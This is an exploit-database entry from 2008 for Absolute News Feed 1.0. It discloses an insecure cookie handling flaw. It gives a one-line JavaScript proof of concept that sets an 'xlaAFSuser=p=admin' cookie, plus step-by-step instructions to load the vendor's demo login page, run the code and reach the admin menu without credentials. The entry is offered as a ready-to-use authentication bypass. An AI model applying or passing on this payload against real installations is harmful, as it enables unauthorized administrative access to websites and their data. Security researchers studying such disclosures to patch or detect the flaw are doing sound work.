Absolute News Feed 1.0 Remote Insecure Cookie Handling Vulnerability

2008-10-31T00:00:00
ID 1337DAY-ID-3983
Type zdt
Reporter Hakxer
Modified 2008-10-31T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ====================================================================
Absolute News Feed 1.0 Remote Insecure Cookie Handling Vulnerability
====================================================================


########################################################################
# Discovered by : Hakxer                                               #
# Script : Absolute News Feed http://www.xigla.com/absolutenf/demo.htm #
# Greetz : Allah , All My friend ,www.educ-up.com                      #
# -------------------------------                                      #
# Poc :                                                                #
# javascript:document.cookie="xlaAFSuser=p=admin";                     #
#                                                                      #
# [~] Exploit                                                          #
#                                                                      #
# Go To admin login : http://www.xigla.com/absolutenf/demo/login.aspx  #
# Execute JS Code : javascript:document.cookie="xlaAFSuser=p=admin";   #
# Now Go to :http://www.xigla.com/absolutenf/demo/menu.aspx            #
# 								       #
# Absolute Products .. Crashed ( Insecure Cookie Vulnerability )       #
########################################################################



#  0day.today [2018-01-02]  #